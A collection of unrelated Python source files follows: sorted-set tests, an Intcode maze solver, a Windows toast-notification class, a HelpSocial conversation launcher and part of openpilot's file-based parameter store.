# No delete -- set disappears on its own when final member popped
def test_set_pop_maximum_empty(self, caller):
caller, caller_name = caller
cardinality = caller.sorted_set_add("some_set", "member", 23)
assert cardinality == 1
pop_val, cardinality = caller.sorted_set_pop("some_set", maximum=True)
assert pop_val == (b"member", 23)
assert cardinality == 0
passed = False
try:
pop_val, cardinality = caller.sorted_set_pop("some_set", maximum=True)
except SetEmptyError:
passed = True
assert passed == True
# No delete -- set disappears on its own when final member popped
def test_set_remove(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
for i in range(n_items):
member = f"key{i}"
caller.sorted_set_remove("some_set", member)
values.pop(0)
if values:
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
# No delete -- set disappears on its own when final member popped
def test_set_pop_n(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
# We'll pop in 2 chunks, once and then the rest
pop_chunk_size = 3
pop_vals, cardinality = caller.sorted_set_pop_n("some_set", pop_chunk_size)
assert values[0:pop_chunk_size] == pop_vals
assert cardinality == n_items - pop_chunk_size
pop_vals, cardinality = caller.sorted_set_pop_n("some_set", n_items)
assert values[pop_chunk_size:n_items] == pop_vals
assert cardinality == 0
passed = False
try:
pop_vals, cardinality = caller.sorted_set_pop_n("some_set", 1)
except SetEmptyError:
passed = True
assert passed == True
def test_set_pop_n_max(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1, maximum=True)
assert set_range == values
# We'll pop in 2 chunks, once and then the rest
pop_chunk_size = 3
pop_vals, cardinality = caller.sorted_set_pop_n(
"some_set", pop_chunk_size, maximum=True
)
assert values[0:pop_chunk_size] == pop_vals
assert cardinality == n_items - pop_chunk_size
pop_vals, cardinality = caller.sorted_set_pop_n(
"some_set", n_items, maximum=True
)
assert values[pop_chunk_size:n_items] == pop_vals
assert cardinality == 0
passed = False
try:
pop_vals, cardinality = caller.sorted_set_pop_n("some_set", 1)
except SetEmptyError:
passed = True
assert passed == True
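# Module-level helpers used as command handlers in this test file: add_1 is
# registered via command_add("add_1") above and returns the incremented value
# wrapped in a Response; sleep_ms simply blocks for the given number of
# milliseconds.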
def add_1(x):
return Response(int(x) + 1)
def sleep_ms(x):
time.sleep(x / 1000.0)
|
15-oxygen-2.py
|
import sys
import unittest
from intcode_threaded import Machine
from queue import Queue
import threading
import os
import time
import numpy as np
from colorama import Fore, Back, Style
#Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
#Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
#Style: DIM, NORMAL, BRIGHT, RESET_ALL
INPUT = "3,1033,1008,1033,1,1032,1005,1032,31,1008,1033,2,1032,1005,1032,58,1008,1033,3,1032,1005,1032,81,1008,1033,4,1032,1005,1032,104,99,1001,1034,0,1039,1001,1036,0,1041,1001,1035,-1,1040,1008,1038,0,1043,102,-1,1043,1032,1,1037,1032,1042,1105,1,124,102,1,1034,1039,1001,1036,0,1041,1001,1035,1,1040,1008,1038,0,1043,1,1037,1038,1042,1106,0,124,1001,1034,-1,1039,1008,1036,0,1041,101,0,1035,1040,1001,1038,0,1043,102,1,1037,1042,1106,0,124,1001,1034,1,1039,1008,1036,0,1041,1001,1035,0,1040,1001,1038,0,1043,1002,1037,1,1042,1006,1039,217,1006,1040,217,1008,1039,40,1032,1005,1032,217,1008,1040,40,1032,1005,1032,217,1008,1039,39,1032,1006,1032,165,1008,1040,39,1032,1006,1032,165,1101,0,2,1044,1105,1,224,2,1041,1043,1032,1006,1032,179,1102,1,1,1044,1105,1,224,1,1041,1043,1032,1006,1032,217,1,1042,1043,1032,1001,1032,-1,1032,1002,1032,39,1032,1,1032,1039,1032,101,-1,1032,1032,101,252,1032,211,1007,0,69,1044,1106,0,224,1102,0,1,1044,1105,1,224,1006,1044,247,1001,1039,0,1034,101,0,1040,1035,1001,1041,0,1036,101,0,1043,1038,102,1,1042,1037,4,1044,1105,1,0,14,64,25,87,47,95,19,65,33,21,99,74,49,51,99,41,76,12,91,19,39,77,68,1,94,19,16,66,72,56,21,81,96,48,35,31,95,41,65,21,84,74,61,27,81,17,77,75,63,80,38,74,91,51,77,30,51,50,93,81,57,78,84,5,32,90,83,21,87,54,92,64,55,81,96,55,89,45,58,37,31,88,51,70,15,93,13,68,76,58,96,34,22,93,27,84,13,27,95,57,88,14,72,96,50,13,54,94,14,92,58,30,6,73,78,56,41,71,86,30,81,2,80,58,90,19,97,43,41,13,96,95,89,19,79,99,77,46,53,23,84,74,62,51,86,40,88,23,75,83,97,95,5,5,86,81,18,45,94,99,79,83,6,82,60,60,97,89,74,24,3,81,85,41,39,89,45,90,80,8,45,92,11,96,99,88,58,75,31,44,5,92,82,38,22,9,57,5,77,65,5,74,87,81,10,46,87,12,52,76,22,25,74,76,61,88,92,14,96,44,80,20,23,24,76,72,64,78,97,87,9,2,91,10,32,78,70,65,70,85,51,1,6,84,83,84,62,70,40,31,96,73,85,12,85,5,53,98,58,78,24,80,70,7,77,60,71,63,13,94,8,85,7,91,47,35,89,18,44,70,71,98,68,99,14,84,82,3,79,38,68,70,44,34,96,35,87,29,95,48,85,30,96,58,16,74,2,78,96,82,20,14,41,22,88,74,13,86,21,28,93,60,92,72,50,43,95,29,97,97,74,23,87,30,62,89,3,90,77,36,42,70,76,18,96,46,93,68,94,25,95,52,83,95,36,39,87,32,23,88,33,96,31,90,15,96,81,45,44,77,64,38,98,75,71,47,99,88,29,85,30,83,48,93,5,28,86,21,16,93,17,99,68,13,87,71,97,56,84,43,26,70,21,66,82,46,96,84,37,85,90,79,33,57,87,73,40,56,45,87,37,91,28,61,89,87,89,16,46,11,77,89,5,3,71,68,61,91,76,16,85,16,83,50,41,31,71,87,20,60,80,48,24,80,7,85,98,62,91,75,46,11,80,36,26,41,24,92,98,53,73,66,73,75,31,23,88,28,89,84,25,78,58,91,77,55,64,70,46,99,71,38,84,15,50,97,85,15,36,77,25,88,70,81,78,58,54,4,34,92,97,13,4,92,80,71,52,16,93,29,99,2,87,37,99,20,73,59,10,44,91,9,2,72,94,1,76,47,79,91,1,18,86,6,10,86,35,81,20,54,98,87,48,65,85,56,68,85,71,55,82,80,19,25,70,87,31,90,87,80,53,51,90,42,87,86,1,91,49,82,21,79,88,54,28,1,78,54,81,47,12,73,79,5,22,89,71,93,63,56,93,33,83,47,75,36,49,81,10,80,99,49,26,51,78,39,70,79,49,95,16,44,97,8,19,60,95,88,17,78,55,77,60,87,25,53,72,26,42,78,7,72,86,51,31,90,40,61,75,61,85,99,4,90,22,37,95,15,64,93,70,48,7,50,81,92,46,15,73,54,81,91,63,34,93,91,58,82,78,89,55,29,96,80,78,3,82,38,57,85,51,83,79,78,88,53,7,78,71,48,92,43,61,96,11,29,77,91,53,1,20,92,56,86,34,20,70,67,91,14,79,92,31,21,82,75,52,89,37,7,10,85,17,66,86,73,8,31,95,49,78,74,6,77,98,71,49,76,90,78,9,81,79,89,63,92,36,79,53,80,20,77,94,96,1,87,45,77,94,80,3,92,96,97,9,73,35,77,66,98,0,0,21,21,1,10,1,0,0,0,0,0,0"
NORTH = 1
SOUTH = 2
WEST = 3
EAST = 4
REVERSE = {
NORTH: SOUTH,
SOUTH: NORTH,
WEST: EAST,
EAST: WEST
}
WALL = 0
EMPTY = 1
OXYGEN = 2
START = 3
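# The ship is stored sparsely: ShipMap.cells maps (x, y) tuples to one of the
# cell types above, with the repair droid starting at (0, 0).  move_to() below
# applies a single step, e.g. move_to((0, 0), NORTH) == (0, 1).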
class ShipMap:
def __init__(self):
self.cells = {}
self.cells[(0,0)] = EMPTY
def mapped(self,point):
return point in self.cells
def get_type(self,point):
return self.cells[point]
# Assumes point is unmapped
def set_type(self,point,cell_type):
self.cells[point] = cell_type
def get_oxygen(self):
for point, info in self.cells.items():
if info == OXYGEN:
return point
return None
def get_empty(self):
result = set()
for point, info in self.cells.items():
if info == EMPTY:
result.add(point)
return result
def get_neighbours(self,point):
result = []
if self.cells[point] == WALL:
raise Exception("It's a WALL!")
for direction in [EAST,NORTH,SOUTH,WEST]:
new_point = move_to(point,direction)
if self.cells[new_point] != WALL:
result.append(new_point)
return result
def draw(self):
points = list(self.cells.keys())
x_min = np.min([p[0] for p in points])
x_max = np.max([p[0] for p in points])
y_min = np.min([p[1] for p in points])
y_max = np.max([p[1] for p in points])
os.system('clear')
map_chars = {
WALL: Fore.CYAN + 'X' + Style.RESET_ALL,
EMPTY: ' ',
OXYGEN: Back.WHITE + Fore.RED + Style.BRIGHT+ 'O' + Style.RESET_ALL,
START: Back.WHITE + Fore.GREEN + Style.BRIGHT + 'S' + Style.RESET_ALL
}
for y in range(y_min,y_max+1):
line = []
for x in range(x_min,x_max+1):
if (x,y) in points:
if x==0 and y==0:
line.append(map_chars[START])
elif self.cells[(x,y)] == WALL:
line.append(map_chars[WALL])
elif self.cells[(x,y)] == EMPTY:
line.append(' ')
elif self.cells[(x,y)] == OXYGEN:
line.append(map_chars[OXYGEN])
else:
line.append(map_chars[WALL])
print(''.join(line))
# Steps to increment for each code
def debug(arg):
#pass
print(arg)
def move_to(point,direction):
if direction == NORTH:
return (point[0],point[1]+1)
elif direction == SOUTH:
return (point[0],point[1]-1)
elif direction == EAST:
return (point[0]+1,point[1])
elif direction == WEST:
return (point[0]-1,point[1])
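# forage() explores the ship with a depth-first search: for each unmapped
# neighbour it sends the movement command to the Intcode machine, records the
# status it reports (WALL/EMPTY/OXYGEN), recurses from the new cell if the move
# succeeded, and then sends the reverse command to backtrack to `point`.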
def forage(machine,ship_map,point):
if not (ship_map.mapped(point)):
raise Exception("Unmapped Point: {}".format(point))
# If this point and all the points around are mapped, then return
mapped = True
for direction in [EAST,NORTH,SOUTH,WEST]:
mapped = mapped and ship_map.mapped(move_to(point,direction))
if mapped:
return True
for direction in [EAST,NORTH,SOUTH,WEST]:
new_point = move_to(point,direction)
if not ship_map.mapped(new_point):
machine.io['input'].put(direction)
answer = machine.io['output'].get()
machine.io['output'].task_done()
ship_map.set_type(new_point,answer)
if answer != WALL:
forage(machine,ship_map,new_point)
# backtrack. Doh!
machine.io['input'].put(REVERSE[direction])
answer = machine.io['output'].get()
machine.io['output'].task_done()
return True
MASSIVE = 1000000
# Dynamic programming solution
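# distance() returns the shortest path length between two open cells: adjacent
# cells are distance 1; otherwise the problem is split at each neighbour of
# point1 that is not in `ignore` (which prevents walking back over cells already
# considered), taking the minimum of d(point1, neighbour) + d(neighbour, point2).
# Finite results are cached symmetrically in `distances`.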
def distance(ship_map,distances,ignore,point1,point2):
if ship_map.get_type(point1) == WALL:
raise Exception("{} is a WALL!".format(point1))
if ship_map.get_type(point2) == WALL:
raise Exception("{} is a WALL!".format(point2))
# Have we calculated this already?
if point1 in distances:
if point2 in distances[point1]:
return distances[point1][point2]
# Are they adjacent?
if point2 in ship_map.get_neighbours(point1):
if not point1 in distances:
distances[point1] = {}
distances[point1][point2] = 1
if not point2 in distances:
distances[point2] = {}
distances[point2][point1] = 1
return 1
# Something massive
minimum = MASSIVE
# Split into sub-problems. But only if the neighbour isn't being ignored.
for neighbour in ship_map.get_neighbours(point1):
if not neighbour in ignore:
new_ignore = ignore.copy()
new_ignore.add(neighbour)
d1 = distance(ship_map,distances,new_ignore,point1,neighbour)
d2 = distance(ship_map,distances,new_ignore,neighbour,point2)
if d1+d2 < minimum:
minimum = d1+d2
# If it's a real distance, cache it.
if minimum < MASSIVE:
if not point1 in distances:
distances[point1] = {}
distances[point1][point2] = minimum
if not point2 in distances:
distances[point2] = {}
distances[point2][point1] = minimum
return minimum
if __name__=='__main__':
program = [int(s) for s in INPUT.split(",")]
machine = Machine()
machine.memory = program.copy()
machine.counter = 0
machine.trace = False
machine.io = {'input': Queue(), 'output': Queue()}
t = threading.Thread(target=machine.run)
    t.daemon = True
t.start()
ship_map = ShipMap()
ship_map.set_type((0,0),EMPTY)
forage(machine,ship_map,(0,0))
ship_map.draw()
destination = ship_map.get_oxygen()
print(destination)
# Get all empty cells and calculate maximum distance to oxygen unit
empty_cells = ship_map.get_empty()
# print(empty_cells)
maximum = 0
distances = {}
for c in empty_cells:
        dist = distance(ship_map,distances,set(),c,destination)
if dist > maximum:
maximum = dist
print(maximum)
|
__init__.py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
__all__ = ['ToastNotifier']
# #############################################################################
# ########## Libraries #############
# ##################################
# standard library
import logging
import threading
from os import path
from time import sleep
from pkg_resources import Requirement
from pkg_resources import resource_filename
# 3rd party modules
from win32api import GetModuleHandle
from win32api import PostQuitMessage
from win32con import CW_USEDEFAULT
from win32con import IDI_APPLICATION
from win32con import IMAGE_ICON
from win32con import LR_DEFAULTSIZE
from win32con import LR_LOADFROMFILE
from win32con import WM_DESTROY
from win32con import WM_USER
from win32con import WS_OVERLAPPED
from win32con import WS_SYSMENU
from win32gui import CreateWindow
from win32gui import DestroyWindow
from win32gui import LoadIcon
from win32gui import LoadImage
from win32gui import NIF_ICON
from win32gui import NIF_INFO
from win32gui import NIF_MESSAGE
from win32gui import NIF_TIP
from win32gui import NIM_ADD
from win32gui import NIM_DELETE
from win32gui import NIM_MODIFY
from win32gui import RegisterClass
from win32gui import UnregisterClass
from win32gui import Shell_NotifyIcon
from win32gui import UpdateWindow
from win32gui import WNDCLASS
from win32gui import NIIF_NOSOUND
# ############################################################################
# ########### Classes ##############
# ##################################
class ToastNotifier(object):
"""Create a Windows 10 toast notification.
from: https://github.com/jithurjacob/Windows-10-Toast-Notifications
"""
def __init__(self):
"""Initialize."""
self._thread = None
def _show_toast(self, title, msg,
icon_path, duration, sound):
"""Notification settings.
:title: notification title
:msg: notification message
:icon_path: path to the .ico file to custom notification
:duration: delay in seconds before notification self-destruction
:sound: if a sound should be played
"""
message_map = {WM_DESTROY: self.on_destroy, }
# Register the window class.
self.wc = WNDCLASS()
self.hinst = self.wc.hInstance = GetModuleHandle(None)
self.wc.lpszClassName = str("PythonTaskbar") # must be a string
self.wc.lpfnWndProc = message_map # could also specify a wndproc.
try:
self.classAtom = RegisterClass(self.wc)
        except Exception:
            pass  # the window class is likely already registered from an earlier toast
style = WS_OVERLAPPED | WS_SYSMENU
self.hwnd = CreateWindow(self.classAtom, "Taskbar", style,
0, 0, CW_USEDEFAULT,
CW_USEDEFAULT,
0, 0, self.hinst, None)
UpdateWindow(self.hwnd)
# icon
if icon_path is not None:
icon_path = path.realpath(icon_path)
else:
icon_path = resource_filename(Requirement.parse("win10toast"), "win10toast/data/python.ico")
icon_flags = LR_LOADFROMFILE | LR_DEFAULTSIZE
try:
hicon = LoadImage(self.hinst, icon_path,
IMAGE_ICON, 0, 0, icon_flags)
except Exception as e:
logging.error("Some trouble with the icon ({}): {}"
.format(icon_path, e))
hicon = LoadIcon(0, IDI_APPLICATION)
# Taskbar icon
flags = NIF_ICON | NIF_MESSAGE | NIF_TIP
nid = (self.hwnd, 0, flags, WM_USER + 20, hicon, "Tooltip")
Shell_NotifyIcon(NIM_ADD, nid)
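        # Re-sending the icon with NIM_MODIFY and the NIF_INFO flag is what
        # actually pops the balloon/toast; NIIF_NOSOUND suppresses the default
        # notification chime in the silent branch.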
if sound is False:
Shell_NotifyIcon(NIM_MODIFY, (self.hwnd, 0, NIF_INFO,
WM_USER + 20,
hicon, "Balloon Tooltip", msg, 200,
title, NIIF_NOSOUND))
else:
Shell_NotifyIcon(NIM_MODIFY, (self.hwnd, 0, NIF_INFO,
WM_USER + 20,
hicon, "Balloon Tooltip", msg, 200,
title))
# take a rest then destroy
sleep(duration)
DestroyWindow(self.hwnd)
UnregisterClass(self.wc.lpszClassName, None)
return None
def show_toast(self, title="Notification", msg="Here comes the message",
icon_path=None, duration=5, threaded=False, sound=True):
"""Notification settings.
:title: notification title
:msg: notification message
:icon_path: path to the .ico file to custom notification
:duration: delay in seconds before notification self-destruction
:sound: if a sound should be played
"""
if not threaded:
self._show_toast(title, msg, icon_path, duration, sound)
else:
if self.notification_active():
                # We have an active notification, let it finish so we don't spam them
return False
            self._thread = threading.Thread(target=self._show_toast, args=(title, msg, icon_path, duration, sound))
self._thread.start()
return True
def notification_active(self):
"""See if we have an active notification showing"""
        if self._thread is not None and self._thread.is_alive():
            # We have an active notification, let it finish so we don't spam them
return True
return False
def on_destroy(self, hwnd, msg, wparam, lparam):
"""Clean after notification ended.
:hwnd:
:msg:
:wparam:
:lparam:
"""
nid = (self.hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, nid)
PostQuitMessage(0)
return None
|
launch_conversation.py
|
#!/usr/bin/env python3
# Author: Jacob Schofield <jacob@helpsocial.com>
# Copyright (c) 2017 HelpSocial, Inc.
# See LICENSE for details
import multiprocessing as mp
import os
import re
import sys
import webbrowser
try:
import ujson as json
except ImportError:
import json
from argparse import ArgumentParser
from multiprocessing import Queue
from time import time, sleep
from urllib.parse import ParseResult, urlsplit, urlunsplit, parse_qs, urlencode
# add the helpsocial directory to the path
# so that we can import it more cleanly
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from helpsocial import RestConnectClient
from helpsocial.auth import UserAuth
from helpsocial.hooks import RequestPrinter, ResponsePrinter
from helpsocial.utils import data_get
class Worker(object):
def __init__(self, client, template_url, token):
self.name = 'Worker-' + os.urandom(4).hex()
self.pid = None
self.template_url = template_url
self.client = client
self.auth = UserAuth(client.auth_scope, client.api_key, token)
def handle(self, manager, conversation_id):
self.pid = str(mp.current_process().pid)
self._log('handling conversation {}', conversation_id)
url = re.sub('{conversation_id}', conversation_id, self.template_url)
try:
authed_url = self._authenticate(url, self._get_single_use_token())
self._log('opening conversation spa [{}]...', authed_url)
if webbrowser.open_new(authed_url):
self._log('opened conversation spa.')
else:
self._log('failed to open conversation spa.')
except Exception as e:
self._log('{} opening conversation {} spa.', e, conversation_id)
finally:
manager.work_complete(self)
self.pid = None
def _get_single_use_token(self):
"""Retrieve an single use token for the authenticated user.
This allows the client to relatively safely authenticate their user through
the query string, as is required when accessing a page via an iFrame, where
headers cannot be set.
"""
self._log('Retrieving single use token.')
response = self.client.get('tokens/exchange', auth=self.auth, http_errors=True)
if response.status_code != 200:
raise Exception(response.json())
return data_get(response.json(), 'data.token')
def _authenticate(self, url, token):
self._log('Authenticating spa request [{}].', url)
parsed = urlsplit(url)
query = {} if not parsed.query else parse_qs(parsed.query)
query.update({
'scope': token['scope'],
'token': token['value']
})
return urlunsplit((parsed.scheme, parsed.netloc, parsed.path,
urlencode(query, doseq=True), parsed.fragment,))
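# For illustration (hypothetical values): given the template-resolved url
#   https://spa.example.com/conversations/123?theme=dark
# and a token {'scope': 'user', 'value': 'abc123'}, _authenticate would return
#   https://spa.example.com/conversations/123?theme=dark&scope=user&token=abc123
# so the SPA can read the credentials from the query string.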
def _log(self, message, *args, **kwargs):
print('[{},{}] {}'.format(self.name, self.pid, message.format(*args, **kwargs)))
class Manager(object):
def __init__(self, workers=-1):
self.cancelled = False
self._workers = Queue(workers)
self._queue = Queue()
self._processes = []
self._thread = mp.Process(target=self._run)
def add_worker(self, worker):
if self._workers.full():
raise Exception('Worker pool full')
self._workers.put_nowait(worker)
def queue(self, conversation):
self._queue.put(conversation)
def has_pending(self):
return not self._queue.empty()
def start(self):
self._thread.start()
def stop(self):
self.cancelled = True
for process in self._processes:
process.terminate()
start = time()
while self._thread.is_alive():
if (time() - start) > 30:
self._thread.terminate()
break
sleep(1)
def work_complete(self, worker):
self._workers.put_nowait(worker)
def _run(self):
while True:
if self.cancelled:
break
try:
worker = self._workers.get_nowait()
except Empty:
print('No worker available.')
sleep(1)
break
try:
job = self._queue.get_nowait()
except Empty:
print('No job available.')
self._workers.put(worker)
sleep(1)
break
process = mp.Process(target=worker.handle, args=(self, job,))
self._processes.append(process)
process.start()
def read_config(path):
"""Read the json configuration
:type path: string
:param path:
:return:
"""
if not os.path.exists(path):
raise IOError('{} does not exist.'.format(path))
with open(path, 'r') as file_:
return json.load(file_)
def single(conversation_id, config_path):
config = read_config(config_path)
client = RestConnectClient(
data_get(config, 'auth.auth_scope'),
data_get(config, 'auth.api_key'),
host=data_get(config, 'api.host'),
ssl=data_get(config, 'api.ssl'),
request_hooks=[RequestPrinter()],
response_hooks=[ResponsePrinter()]
)
manager = Manager()
manager.add_worker(Worker(client,
data_get(config, 'launch_conversation.spa_url'),
data_get(config, 'launch_conversation.user_token')))
manager.queue(conversation_id)
manager.start()
while manager.has_pending():
sleep(1)
manager.stop()
if __name__ == '__main__':
parser = ArgumentParser()
sub = parser.add_subparsers()
single_cmd = sub.add_parser('single')
single_cmd.add_argument('conversation_id', help='Conversation id to open.')
single_cmd.add_argument('--config', dest='config_path', default=os.path.join(os.path.abspath(os.path.dirname(__file__)), '.config.json'))
single_cmd.set_defaults(func=single)
args = vars(parser.parse_args())
func = args['func']
del args['func']
func(**args)
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key-value pair is stored as a file named <key> with contents <value>, located at
<params_dir>/d/<key>.
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/d to <params_dir>/<tmp>
before deleting the old <params_dir>/d directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.PERSISTENT],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.PERSISTENT],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, type, value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path+"/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db='/data/params'):
self.db = db
